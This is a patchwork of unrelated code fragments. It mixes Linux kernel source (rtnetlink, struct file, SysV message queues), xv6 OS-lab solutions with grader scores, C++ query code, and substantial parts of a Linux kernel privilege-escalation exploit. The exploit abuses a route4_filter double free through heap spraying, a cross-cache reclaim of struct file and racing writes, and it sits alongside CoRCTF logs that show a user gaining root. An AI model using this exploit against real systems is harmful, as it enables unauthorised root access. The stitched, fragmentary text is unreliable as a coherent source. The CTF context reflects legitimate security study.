struct rlimit {
    rlim_t rlim_cur;  /* The current (soft) limit. */
    rlim_t rlim_max;  /* The hard limit. */
};
In this structure, rlim_cur is the soft limit to get or set, and rlim_max is the hard limit. Changing these values is subject to three rules:
1) Any process may change its soft limit to a value less than or equal to its hard limit.
2) Any process may lower its hard limit, but an unprivileged process cannot raise it again afterwards; the new value must be greater than or equal to the soft limit.
3) Only a superuser process may raise a hard limit.
An unlimited resource is indicated by the constant RLIM_INFINITY (the value RLIM_INFINITY denotes no limit on a resource).
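As a quick illustration of rule 1, the sketch below uses only the standard POSIX getrlimit()/setrlimit() calls (nothing project-specific) to raise the soft limit for open file descriptors up to the current hard limit, which is always permitted even for an unprivileged process:

#include <stdio.h>
#include <sys/resource.h>

int main(void)
{
    struct rlimit rl;

    /* Read the current soft/hard limits for open file descriptors. */
    if (getrlimit(RLIMIT_NOFILE, &rl) != 0) {
        perror("getrlimit");
        return 1;
    }
    printf("soft=%ld hard=%ld\n", (long)rl.rlim_cur, (long)rl.rlim_max);

    /* Rule 1: any process may raise its soft limit up to the hard limit. */
    rl.rlim_cur = rl.rlim_max;
    if (setrlimit(RLIMIT_NOFILE, &rl) != 0) {
        perror("setrlimit");
        return 1;
    }
    return 0;
}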
	rtnl_lock();
	tab = rtnl_dereference(rtnl_msg_handlers[protocol]);
	if (tab == NULL) {
		tab = kcalloc(RTM_NR_MSGTYPES, sizeof(void *), GFP_KERNEL);
		if (!tab)
			goto unlock;

		/* ensures we see the 0 stores */
		rcu_assign_pointer(rtnl_msg_handlers[protocol], tab);
	}

	old = rtnl_dereference(tab[msgindex]);
	if (old) {
		link = kmemdup(old, sizeof(*old), GFP_KERNEL);
		if (!link)
			goto unlock;
	} else {
		link = kzalloc(sizeof(*link), GFP_KERNEL);
		if (!link)
			goto unlock;
	}
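The snippet above is from rtnl_register_internal(), which populates the rtnl_msg_handlers table; subsystems normally reach it through the rtnl_register() wrapper. For context, representative registrations from rtnetlink_init() look like this (the exact signature and flags vary slightly across kernel versions):

/* net/core/rtnetlink.c, rtnetlink_init() -- installs the handlers that
 * the dispatch code below looks up via rtnl_get_link(family, type). */
rtnl_register(PF_UNSPEC, RTM_GETLINK, rtnl_getlink, rtnl_dump_ifinfo, 0);
rtnl_register(PF_UNSPEC, RTM_SETLINK, rtnl_setlink, NULL, 0);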
		link = rtnl_get_link(family, type);
		if (!link || !link->dumpit) {
			family = PF_UNSPEC;
			link = rtnl_get_link(family, type);
			if (!link || !link->dumpit)
				goto err_unlock;
		}
		owner = link->owner;
		dumpit = link->dumpit;

		if (type == RTM_GETLINK - RTM_BASE)
			min_dump_alloc = rtnl_calcit(skb, nlh);

		err = 0;
		/* need to do this before rcu_read_unlock() */
		if (!try_module_get(owner))
			err = -EPROTONOSUPPORT;
rcu_read_unlock();
		rtnl = net->rtnl;
		if (err == 0) {
			struct netlink_dump_control c = {
				.dump		= dumpit,
				.min_dump_alloc	= min_dump_alloc,
				.module		= owner,
			};
			err = netlink_dump_start(rtnl, skb, nlh, &c);
			/* netlink_dump_start() will keep a reference on
			 * module if dump is still in progress.
			 */
			module_put(owner);
		}
		return err;
	}
	link = rtnl_get_link(family, type);
	if (!link || !link->doit) {
		family = PF_UNSPEC;
		link = rtnl_get_link(PF_UNSPEC, type);
		if (!link || !link->doit)
			goto out_unlock;
	}
struct file {
	union {
		struct llist_node	fu_llist;
		struct rcu_head 	fu_rcuhead;
	} f_u;
	struct path		f_path;
	struct inode		*f_inode;	/* cached value */
	const struct file_operations	*f_op;

	/*
	 * Protects f_ep, f_flags.
	 * Must not be taken from IRQ context.
	 */
	spinlock_t		f_lock;
	enum rw_hint		f_write_hint;
	atomic_long_t		f_count;
	unsigned int		f_flags;
	fmode_t			f_mode;		/* read/write permissions */
	struct mutex		f_pos_lock;
	loff_t			f_pos;
	struct fown_struct	f_owner;
	const struct cred	*f_cred;
	struct file_ra_state	f_ra;

	u64			f_version;
#ifdef CONFIG_SECURITY
	void			*f_security;
#endif
	/* needed for tty driver, and maybe others */
	void			*private_data;

#ifdef CONFIG_EPOLL
	/* Used by fs/eventpoll.c to link all the hooks to this file */
	struct hlist_head	*f_ep;
#endif /* #ifdef CONFIG_EPOLL */
	struct address_space	*f_mapping;
	errseq_t		f_wb_err;
	errseq_t		f_sb_err; /* for syncfs */
} __randomize_layout
  __attribute__((aligned(4)));	/* lest something weird decides that 2 is OK */
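struct file objects come from the filp slab cache, which is why the exploit below sprays open() calls to reclaim the freed slot. A minimal userspace sketch, assuming only the standard kcmp(2) syscall (the same trick the exploit uses later to find its overlapped file), shows how to detect two descriptors that reference the same struct file:

#define _GNU_SOURCE
#include <assert.h>
#include <fcntl.h>
#include <linux/kcmp.h>
#include <sys/syscall.h>
#include <unistd.h>

int main(void)
{
    int a = open("/etc/passwd", O_RDONLY);
    int b = dup(a);                          /* b shares a's struct file */
    int c = open("/etc/passwd", O_RDONLY);   /* separate struct file */

    /* kcmp() returns 0 when both fds point at the same struct file. */
    assert(syscall(SYS_kcmp, getpid(), getpid(), KCMP_FILE, a, b) == 0);
    assert(syscall(SYS_kcmp, getpid(), getpid(), KCMP_FILE, a, c) != 0);
    return 0;
}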
	// if the exploit keeps failing, please tune the middle and end
	int middle = 38; // 38
	int end = middle + 40; // 40

	// 2-2. spray (38+3)*32 filters in kmalloc-192 & kmalloc-256
	printf("[2] spray (38+3)*32 kmalloc-192 & kmalloc-256\n");
	for (int i = 0; i < middle; i++)
		add_tc_basic(sprayfd, i + 1, payload, 193, 32);

	add_tc_basic(sprayfd, middle + 1, payload, 193, 32);
	add_tc_basic(sprayfd, middle + 2, payload, 193, 32);
	add_tc_basic(sprayfd, middle + 3, payload, 193, 32);

	if (write(pipe_child[1], "OK", 2) != 2)
		err(1, "[-] write to parent\n");

	// 4. spray more filters in kmalloc-192 & kmalloc-256
	if (read(pipe_parent[0], msg, 2) != 2)
		err(1, "[-] read from parent");
	// add_tc_basic(sprayfd, middle+2, payload, 129, 32);

	// prepare another part for cross cache
	printf("[4] spray kmalloc-192 & kmalloc-256\n");
	for (int i = middle + 2; i < end; i++)
		add_tc_basic(sprayfd, i + 1, payload, 193, 32);

	// 5. free (end-24)*32 kmalloc-192 & kmalloc-256
	printf("[5] free (end-24)*32 kmalloc-192 & kmalloc-256\n");
	for (int i = 1; i < end - 24; i++) {
		// prevent double free of 192 and being reclaimed by others
		if (i == middle || i == middle + 1)
			continue;
		delete_tc_basic(sprayfd, i + 1);
	}

	if (write(pipe_child[1], "OK", 2) != 2)
		err(1, "[-] write to parent\n");

	// 7. free (end-middle+1)*32 kmalloc-192 & kmalloc-256
	if (read(pipe_parent[0], msg, 2) != 2)
		err(1, "[-] read from parent");
	// if (cpu_cores == 1) sleep(1);
	printf("[7] free (end-middle+1)*32 kmalloc-192 & kmalloc-256\n");
	delete_tc_basic(sprayfd, middle + 2);
	delete_tc_basic(sprayfd, middle + 3);
	delete_tc_basic(sprayfd, 1);
	for (int i = middle + 2; i < end; i++)
		delete_tc_basic(sprayfd, i + 1);
	// getchar();

	if (write(pipe_child[1], "OK", 2) != 2)
		err(1, "[-] write to parent\n");

	while (1) { sleep(1000); }
}
	while (!run_write) {} // wait for thread 1 to prepare write
	printf("[11-2] write evil data after the slow write\n");
	run_spray = 1;
	if (writev(overlap_a, &iov, 1) < 0)
		printf("[-] failed to write\n");
}
	// Get old limits
	if (getrlimit(RLIMIT_NOFILE, &old_lim) == 0)
		printf("Old limits -> soft limit= %ld \t hard limit= %ld \n",
		       old_lim.rlim_cur, old_lim.rlim_max);

	pin_on_cpu(0);
	printf("[*] starting exploit, num of cores: %d\n", cpu_cores);

	// open & setup the socket
	sockfd = socket(PF_NETLINK, SOCK_RAW, 0);
	assert(sockfd != -1);
	add_qdisc(sockfd);

	// 3. allocate a route4_filter (vulnerable object)
	if (read(pipe_child[0], msg, 2) != 2)
		err(1, "[-] read from parent");
	printf("[3] allocate the vulnerable filter\n");
	add_tc_(sockfd, 0, 0, 0, NLM_F_EXCL | NLM_F_CREATE); // handle = 0

	if (write(pipe_parent[1], "OK", 2) != 2)
		err(1, "[-] write to child");

	// 6. 1st free of the route4_filter, returns the `kmalloc-256` page to the page allocator
	if (read(pipe_child[0], msg, 2) != 2)
		err(1, "[-] read from parent");

	// free the object, to free the slab
	printf("[6] 1st freed the filter object\n");
	// getchar();
	add_tc_(sockfd, 0x11, 0x12, 0, NLM_F_CREATE); // handle = 0

	// wait for the vulnerable object being freed
	usleep(500 * 1000);
	if (write(pipe_parent[1], "OK", 2) != 2)
		err(1, "[-] write to child");

	// 8. spray 4000 unprivileged `file`
	if (read(pipe_child[0], msg, 2) != 2)
		err(1, "[-] read from parent");

	usleep(1000 * 1000);
	printf("[8] spray 4000 unprivileged `file`\n");
	for (int i = 0; i < spray_num_1; i++) {
		pin_on_cpu(i % cpu_cores);
		fds[i] = open("./data2", 1);
		assert(fds[i] > 0);
	}
	// printf("pause before 2nd free\n");
	// getchar();

	// 9. 2nd free of the route4_filter, which will free the file
	printf("[9] 2nd free the filter object\n");
	add_tc_(sockfd, 0x11, 0x13, 0, NLM_F_CREATE); // handle = 0
	printf("pause after 2nd free\n");
	// getchar();
	// sleep(10000);
	usleep(1000 * 100); // should not sleep too long, otherwise file might be claimed by others

	// 10. spray 5000 unprivileged `file` & find the overlapped file
	printf("[10] spraying 5000 unprivileged `file`\n");
	for (int i = 0; i < spray_num_2; i++) {
		pin_on_cpu(i % cpu_cores);
		fd_2[i] = open("./uaf", 1);
		assert(fd_2[i] > 0);
		for (int j = 0; j < spray_num_1; j++) {
			// 10-1. spray one `file` & use kcmp to check if we take up the vulnerable object
			if (syscall(__NR_kcmp, getpid(), getpid(), KCMP_FILE, fds[j], fd_2[i]) == 0) {
				printf("[10-1] found overlapped file, id : %d, %d\n", i, j);
				overlap_a = fds[j];
				overlap_b = fd_2[i];

				// 11. start 2 threads: Thread 1 takes the write lock; Thread 2 writes evil data
				printf("[11] start 2 threads compete to write\n");
				pthread_t pid, pid2;
				pthread_create(&pid, NULL, slow_write, NULL);
				pthread_create(&pid2, NULL, write_cmd, NULL);
QueryResult
NotQuery::eval(TextQuery &t) const
{
    auto result = query.eval(t);
    auto ret_lines = std::make_shared<std::set<int>>();
    auto beg = result.begin(), end = result.end();
    auto size = result.get_file()->size();
    for (decltype(size) n = 0; n != size; ++n) {
        if (beg == end || *beg != n) {
            ret_lines->insert(n);   // line not in the operand's result: NOT matches it
        } else if (beg != end) {
            ++beg;                  // line was in the operand's result: skip it
        }
    }
    return QueryResult(rep(), ret_lines, result.get_file());
}

QueryResult
OrQuery::eval(TextQuery &test) const
{
    auto left = lhs.eval(test);
    auto right = rhs.eval(test);
    // start with the left operand's line numbers ...
    auto ret_lines = std::make_shared<std::set<int>>(left.begin(), left.end());
    // ... then union in the right operand's lines
    ret_lines->insert(right.begin(), right.end());
    return QueryResult(rep(), ret_lines, left.get_file());
}

QueryResult
AndQuery::eval(TextQuery &test) const
{
    auto left = lhs.eval(test);
    auto right = rhs.eval(test);
    auto ret_lines = std::make_shared<std::set<int>>();
    // intersection: keep only the line numbers present in both results
    std::set_intersection(left.begin(), left.end(),
                          right.begin(), right.end(),
                          std::inserter(*ret_lines, ret_lines->begin()));
    return QueryResult(rep(), ret_lines, left.get_file());
}
ctf@CoRCTF:/$ /myexp
msg_queue_addr:0xffffa041855bf6c0
page_msg_addr:0xffffa041855c1000
kernelbase_addr:0xffffffff9ea00000
init_task_addr:0xffffffff9f6124c0
init_cred_addr:0xffffffff9f633060
pid:0 getpid:86
pid:86 getpid:86
current_task_addr:0xffffa04186128ac0
[+] handler_write_task created
[+] handler_write_msg created
[*] page fault 1 at page1+0x1000
get_page_msg
[+] page fault 2 at page2+0x1000
write msg ok
[*] msg next write is ok
write task ok
debug uid:0
root@CoRCTF:/# id
uid=0(root) gid=0(root)
void
scheduler(void)
{
  struct proc *p;
  struct cpu *c = mycpu();

  c->proc = 0;
  for(;;){
    // Avoid deadlock by ensuring that devices can interrupt.
    intr_on();

    int nproc = 0;
    for(p = proc; p < &proc[NPROC]; p++) {
      acquire(&p->lock);
      if(p->state != UNUSED) {
        nproc++;
      }
      if(p->state == RUNNABLE) {
        // Switch to chosen process. It is the process's job
        // to release its lock and then reacquire it
        // before jumping back to us.
        p->state = RUNNING;
        c->proc = p;
        swtch(&c->context, &p->context);

        // Process is done running for now.
        // It should have changed its p->state before coming back.
        c->proc = 0;
      }
      release(&p->lock);
    }
    if(nproc <= 2) {   // only init and sh exist
      intr_on();
      asm volatile("wfi");
    }
  }
}
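swtch(&c->context, &p->context) is where control actually leaves the scheduler: it stores the scheduler's ra, sp, and callee-saved registers into c->context and loads p's. Only those registers need saving because swtch is called as an ordinary C function, so the caller-saved registers are already spilled by the compiler at the call site. The layout, from xv6's kernel/proc.h:

// Saved registers for kernel context switches (kernel/proc.h).
struct context {
  uint64 ra;
  uint64 sp;

  // callee-saved
  uint64 s0;
  uint64 s1;
  uint64 s2;
  uint64 s3;
  uint64 s4;
  uint64 s5;
  uint64 s6;
  uint64 s7;
  uint64 s8;
  uint64 s9;
  uint64 s10;
  uint64 s11;
};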
  // we're about to switch the destination of traps from
  // kerneltrap() to usertrap(), so turn off interrupts until
  // we're back in user space, where usertrap() is correct.
  intr_off();

  // send syscalls, interrupts, and exceptions to trampoline.S
  w_stvec(TRAMPOLINE + (uservec - trampoline));

  // set up trapframe values that uservec will need when
  // the process next re-enters the kernel.
  p->trapframe->kernel_satp = r_satp();         // kernel page table
  p->trapframe->kernel_sp = p->kstack + PGSIZE; // process's kernel stack
  p->trapframe->kernel_trap = (uint64)usertrap;
  p->trapframe->kernel_hartid = r_tp();         // hartid for cpuid()

  // set up the registers that trampoline.S's sret will use
  // to get to user space.

  // set S Previous Privilege mode to User.
  unsigned long x = r_sstatus();
  x &= ~SSTATUS_SPP; // clear SPP to 0 for user mode
  x |= SSTATUS_SPIE; // enable interrupts in user mode
  w_sstatus(x);
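  // For reference, SSTATUS_SPP and SSTATUS_SPIE are plain bit masks from
  // xv6's kernel/riscv.h: SPP records which privilege mode sret returns
  // to, and SPIE is the interrupt-enable bit that takes effect after sret.
  //   #define SSTATUS_SPP  (1L << 8)  // Previous mode: 1=Supervisor, 0=User
  //   #define SSTATUS_SPIE (1L << 5)  // Supervisor Previous Interrupt Enable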
  // set S Exception Program Counter to the saved user pc.
  w_sepc(p->trapframe->epc);

  // tell trampoline.S the user page table to switch to.
  uint64 satp = MAKE_SATP(p->pagetable);

  // jump to trampoline.S at the top of memory, which
  // switches to the user page table, restores user registers,
  // and switches to user mode with sret.
  uint64 fn = TRAMPOLINE + (userret - trampoline);
  ((void (*)(uint64,uint64))fn)(TRAPFRAME, satp);
}
.globl userret
userret:
        # userret(TRAPFRAME, pagetable)
        # switch from kernel to user.
        # usertrapret() calls here.
        # a0: TRAPFRAME, in user page table.
        # a1: user page table, for satp.

        # switch to the user page table.
        csrw satp, a1
        sfence.vma zero, zero

        # put the saved user a0 in sscratch, so we
        # can swap it with our a0 (TRAPFRAME) in the last step.
        ld t0, 112(a0)
        csrw sscratch, t0

        # restore user a0, and save TRAPFRAME in sscratch
        csrrw a0, sscratch, a0

        # return to user mode and user pc.
        # usertrapret() set up sstatus and sepc.
        sret

        #
        # interrupts and exceptions while in supervisor
        # mode come here.
        #
        # push all registers, call kerneltrap(), restore, return.
        #
.globl kerneltrap
.globl kernelvec
.align 4
kernelvec:
        // make room to save registers.
        addi sp, sp, -256
  // give up the CPU if this is a timer interrupt.
  if(which_dev == 2 && myproc() != 0 && myproc()->state == RUNNING)
    yield();

  // the yield() may have caused some traps to occur,
  // so restore trap registers for use by kernelvec.S's sepc instruction.
  w_sepc(sepc);
  w_sstatus(sstatus);
}
// mappages() is the key routine for setting up page tables and adding page-table
// entries. For each page it calls walk() to locate (and, if needed, allocate) the
// PTE, writes the corresponding physical address into it, and repeats until the
// whole range [va, va+size) has been mapped.
int
mappages(pagetable_t pagetable, uint64 va, uint64 size, uint64 pa, int perm)
{
  uint64 a, last;
  pte_t *pte;
  a = PGROUNDDOWN(va);
  last = PGROUNDDOWN(va + size - 1);
  for(;;){
    if((pte = walk(pagetable, a, 1)) == 0)
      return -1;
    if(*pte & PTE_V)
      panic("remap");
    *pte = PA2PTE(pa) | perm | PTE_V;
    if(a == last)
      break;
    a += PGSIZE;
    pa += PGSIZE;
  }
  return 0;
}
  // map kernel text executable and read-only.
  kvmmap(KERNBASE, KERNBASE, (uint64)etext-KERNBASE, PTE_R | PTE_X);

  // map kernel data and the physical RAM we'll make use of.
  kvmmap((uint64)etext, (uint64)etext, PHYSTOP-(uint64)etext, PTE_R | PTE_W);

  // map the trampoline for trap entry/exit to
  // the highest virtual address in the kernel.
  kvmmap(TRAMPOLINE, (uint64)trampoline, PGSIZE, PTE_R | PTE_X);
}

    // Allocate a page for the process's kernel stack.
    // Map it high in memory, followed by an invalid
    // guard page.
    char *pa = kalloc();
    if(pa == 0)
      panic("kalloc");
    uint64 va = KSTACK((int) (p - proc));
    kvmmap(va, (uint64)pa, PGSIZE, PTE_R | PTE_W);
    p->kstack = va;
  }
  kvminithart();
}
  // Allocate two pages at the next page boundary.
  // Use the second as the user stack.
  sz = PGROUNDUP(sz);
  uint64 sz1;
  if((sz1 = uvmalloc(pagetable, sz, sz + 2*PGSIZE)) == 0)
    goto bad;
  sz = sz1;
  uvmclear(pagetable, sz-2*PGSIZE);
  sp = sz;
  stackbase = sp - PGSIZE;

  // arguments to user main(argc, argv)
  // argc is returned via the system call return
  // value, which goes in a0.
  p->trapframe->a1 = sp;

  // Save program name for debugging.
  for(last=s=path; *s; s++)
    if(*s == '/')
      last = s+1;
  safestrcpy(p->name, last, sizeof(p->name));

  // Commit to the user image.
  oldpagetable = p->pagetable;
  p->pagetable = pagetable;
  p->sz = sz;
  p->trapframe->epc = elf.entry;  // initial program counter = main
  p->trapframe->sp = sp;          // initial stack pointer
  proc_freepagetable(oldpagetable, oldsz);
return argc; // this ends up in a0, the first argument to main(argc, argv)
// Allocate one 4096-byte page of physical memory.
// Returns a pointer that the kernel can use.
// Returns 0 if the memory cannot be allocated.
void *
kalloc(void)
{
  struct run *r;
  acquire(&kmem.lock);
  r = kmem.freelist;
  if(r)
    kmem.freelist = r->next;
  release(&kmem.lock);

  if(r){
    memset((char*)r, 5, PGSIZE); // fill with junk
    cow_num[(uint64)r >> 12]++;  // COW lab: a fresh page starts with one reference
  }
  return (void*)r;
}

// (separate fragment, from usertrap(): scause 15 is a store page fault,
//  which is where the COW copy is triggered)
  } else if(r_scause() == 15){
    // printf("taps b\n");
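The matching decrement for kalloc()'s reference increment has to happen in kfree(). A sketch under the assumptions this author's code implies (cow_num[] holds per-page reference counts indexed by physical page number; a real solution would also guard the counter with a lock, since the bare decrement below is racy):

void
kfree(void *pa)
{
  struct run *r;

  if(((uint64)pa % PGSIZE) != 0 || (char*)pa < end || (uint64)pa >= PHYSTOP)
    panic("kfree");

  // COW lab: drop one reference; free the page only when none remain.
  if(--cow_num[(uint64)pa >> 12] > 0)
    return;

  // Fill with junk to catch dangling refs.
  memset(pa, 1, PGSIZE);

  r = (struct run*)pa;
  acquire(&kmem.lock);
  r->next = kmem.freelist;
  kmem.freelist = r;
  release(&kmem.lock);
}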
os@os-virtual-machine:~/xxv6/xv6-labs-2020$ ./grade-lab-cow
make: 'kernel/kernel' is up to date.
== Test running cowtest == (4.9s)
== Test   simple ==
  simple: OK
== Test   three ==
  three: OK
== Test   file ==
  file: OK
== Test usertests == (107.3s)
  (Old xv6.out.usertests failure log removed)
== Test   usertests: copyin ==
  usertests: copyin: OK
== Test   usertests: copyout ==
  usertests: copyout: OK
== Test   usertests: all tests ==
  usertests: all tests: OK
== Test time ==
  time: OK
Score: 110/110
  for (t = all_thread; t < all_thread + MAX_THREAD; t++) {
    if (t->state == FREE) break;
  }
  t->state = RUNNABLE;
  // YOUR CODE HERE
  t->context.ra = (uint64)func;                  // start executing at func
  t->context.sp = (uint64)t->stack + STACK_SIZE; // stack grows down from the top
}
  if (current_thread != next_thread) {  /* switch threads? */
    next_thread->state = RUNNING;
    t = current_thread;
    current_thread = next_thread;
    /* YOUR CODE HERE
     * Invoke thread_switch to switch from t to next_thread:
     * thread_switch(??, ??);
     */
    thread_switch((uint64)&t->context, (uint64)&current_thread->context);
struct thread {
  char           stack[STACK_SIZE]; /* the thread's stack */
  int            state;             /* FREE, RUNNING, RUNNABLE */
  struct context context;           /* saved registers (ra, sp, callee-saved) */
};
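The lab's user/uthread.c drives these routines by creating three threads and letting them yield to one another. From memory (details may differ slightly from the handout), its main() looks roughly like this:

int
main(int argc, char *argv[])
{
  a_started = b_started = c_started = 0;
  a_n = b_n = c_n = 0;
  thread_init();               // register main as the initial running thread
  thread_create(thread_a);
  thread_create(thread_b);
  thread_create(thread_c);
  thread_schedule();           // hand the CPU to the first RUNNABLE thread
  exit(0);
}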
make: 'kernel/kernel' is up to date.
== Test uthread ==
  uthread: OK (0.9s)
== Test answers-thread.txt ==
  answers-thread.txt: OK
== Test ph_safe ==
make: 'ph' is up to date.
  ph_safe: OK (10.8s)
== Test ph_fast ==
make: 'ph' is up to date.
  ph_fast: OK (22.3s)
== Test barrier ==
make: 'barrier' is up to date.
  barrier: OK (11.1s)
== Test time ==
  time: OK
Score: 60/60
// Look through buffer cache for block on device dev.
// If not found, allocate a buffer.
// In either case, return locked buffer.
static struct buf*
bget(uint dev, uint blockno)
{
  struct buf *b;
  struct buf *tmp;
  uint32 bid;

  bid = HASH(blockno);
  tmp = 0;

  // Not cached.
  // Recycle the least recently used (LRU) unused buffer.
  // for(b = bcache.head.prev; b != &bcache.head; b = b->prev){
  //   if(b->refcnt == 0) {
  //     b->dev = dev;
  //     b->blockno = blockno;
  //     b->valid = 0;
  //     b->refcnt = 1;
  //     release(&bcache.lock);
  //     acquiresleep(&b->lock);
  //     return b;
  //   }
  // }
  panic("bget: no buffers");
}

// Return a locked buf with the contents of the indicated block.
struct buf*
bread(uint dev, uint blockno)
{
  struct buf *b;

  // printf("bread-beg\n");
  b = bget(dev, blockno);
  if(!b->valid) {
    virtio_disk_rw(b, 0);
    b->valid = 1;
  }
  // printf("bread-end\n");
  return b;
}

// Write b's contents to disk. Must be locked.
void
bwrite(struct buf *b)
{
  if(!holdingsleep(&b->lock))
    panic("bwrite");
  virtio_disk_rw(b, 1);
}

// Release a locked buffer.
// Move to the head of the most-recently-used list.
void
brelse(struct buf *b)
{
  uint32 bid;

  // printf("brelse-beg\n");
  bid = HASH(b->blockno);
  if(!holdingsleep(&b->lock))
    panic("brelse");
  // printf("re_sleep:%s\n",b->lock.name);
  releasesleep(&b->lock);
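HASH() and the bucket layout are not shown in these excerpts. A plausible sketch, assuming NBUCKET buckets each with its own spinlock, which is the standard shape for this lab (the HASH/bid naming follows the code above; the rest is an assumption):

#define NBUCKET 13
#define HASH(blockno) ((blockno) % NBUCKET)

struct {
  struct spinlock lock[NBUCKET];  // one lock per bucket instead of one global lock
  struct buf buf[NBUF];
  struct buf head[NBUCKET];       // per-bucket list heads
} bcache;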
struct msg_queue {
	struct kern_ipc_perm q_perm;
	time64_t q_stime;		/* last msgsnd time */
	time64_t q_rtime;		/* last msgrcv time */
	time64_t q_ctime;		/* last change time */
	unsigned long q_cbytes;		/* current number of bytes on queue */
	unsigned long q_qnum;		/* number of messages in queue */
	unsigned long q_qbytes;		/* max number of bytes on queue */
	struct pid *q_lspid;		/* pid of last msgsnd */
	struct pid *q_lrpid;		/* last receive pid */

	struct list_head q_messages;
	struct list_head q_receivers;
	struct list_head q_senders;
} __randomize_layout;
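Each of these objects is created by msgget() and filled through the msgsnd() path quoted next. A minimal userspace round trip using only the standard SysV API (nothing exploit-specific) exercises exactly this kernel code:

#include <stdio.h>
#include <string.h>
#include <sys/ipc.h>
#include <sys/msg.h>

struct msgbuf_demo {
    long mtype;        /* must be > 0 */
    char mtext[64];
};

int main(void)
{
    /* msgget() allocates the struct msg_queue shown above. */
    int qid = msgget(IPC_PRIVATE, IPC_CREAT | 0600);
    if (qid < 0) { perror("msgget"); return 1; }

    struct msgbuf_demo m = { .mtype = 1 };
    strcpy(m.mtext, "hello");

    /* msgsnd() ends up in the list_add_tail() path quoted below. */
    if (msgsnd(qid, &m, sizeof(m.mtext), 0) < 0) { perror("msgsnd"); return 1; }
    if (msgrcv(qid, &m, sizeof(m.mtext), 1, 0) < 0) { perror("msgrcv"); return 1; }
    printf("received: %s\n", m.mtext);

    msgctl(qid, IPC_RMID, NULL); /* destroy the queue */
    return 0;
}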
		if (!pipelined_send(msq, msg, &wake_q)) {
			/* no one is waiting for this message, enqueue it */
			list_add_tail(&msg->m_list, &msq->q_messages);
			msq->q_cbytes += msgsz;
			msq->q_qnum++;
			atomic_add(msgsz, &ns->msg_bytes);
			atomic_inc(&ns->msg_hdrs);
		}

		msg = ERR_PTR(-EACCES);
		if (ipcperms(ns, &msq->q_perm, S_IRUGO))
			goto out_unlock1;
ipc_lock_object(&msq->q_perm);
		/* raced with RMID? */
		if (!ipc_valid_object(&msq->q_perm)) {
			msg = ERR_PTR(-EIDRM);
			goto out_unlock0;
		}

		msg = find_msg(msq, &msgtyp, mode);
		if (!IS_ERR(msg)) {
			/*
			 * Found a suitable message.
			 * Unlink it from the queue.
			 */
			if ((bufsz < msg->m_ts) && !(msgflg & MSG_NOERROR)) {
				msg = ERR_PTR(-E2BIG);
				goto out_unlock0;
			}
			/*
			 * If we are copying, then do not unlink message and do
			 * not update queue parameters.
			 */
			if (msgflg & MSG_COPY) {
				msg = copy_msg(msg, copy);
				goto out_unlock0;
			}
		/*
		 * Lockless receive, part 1:
		 * We don't hold a reference to the queue and getting a
		 * reference would defeat the idea of a lockless operation,
		 * thus the code relies on rcu to guarantee the existence of
		 * msq:
		 * Prior to destruction, expunge_all(-EIDRM) changes r_msg.
		 * Thus if r_msg is -EAGAIN, then the queue not yet destroyed.
		 */
		rcu_read_lock();
		/*
		 * Lockless receive, part 2:
		 * The work in pipelined_send() and expunge_all():
		 * - Set pointer to message
		 * - Queue the receiver task for later wakeup
		 * - Wake up the process after the lock is dropped.
		 *
		 * Should the process wake up before this wakeup (due to a
		 * signal) it will either see the message and continue ...
		 */
		msg = READ_ONCE(msr_d.r_msg);
		if (msg != ERR_PTR(-EAGAIN)) {
			/* see MSG_BARRIER for purpose/pairing */
			smp_acquire__after_ctrl_dep();

			goto out_unlock1;
		}
		/*
		 * ... or see -EAGAIN, acquire the lock to check the message
		 * again.
		 */
		ipc_lock_object(&msq->q_perm);

		msg = READ_ONCE(msr_d.r_msg);
		if (msg != ERR_PTR(-EAGAIN))
			goto out_unlock0;

		list_del(&msr_d.r_list);
		if (signal_pending(current)) {
			msg = ERR_PTR(-ERESTARTNOHAND);
			goto out_unlock0;
		}
ctf@CoRCTF:/exp$ id
uid=1000(ctf) gid=1000(ctf) groups=1000(ctf)
ctf@CoRCTF:/exp$ /myexp
idx:0
[*] get kernel_base_addr...
[+] init_ipc_ns: 0xffffffffa603d7a0
[+] kernel_base: 0xffffffffa5400000
[+] init_task: 0xffffffffa60124c0
[+] init_cred: 0xffffffffa6033060
[*] search this process task_struct
0 86 86 86
[*] get this process task_struct:0xffff8d5c46128040
[*] now write for cred
idx:1
getshelling
[*]----getshell ok
root@CoRCTF:/exp# id
uid=0(root) gid=0(root)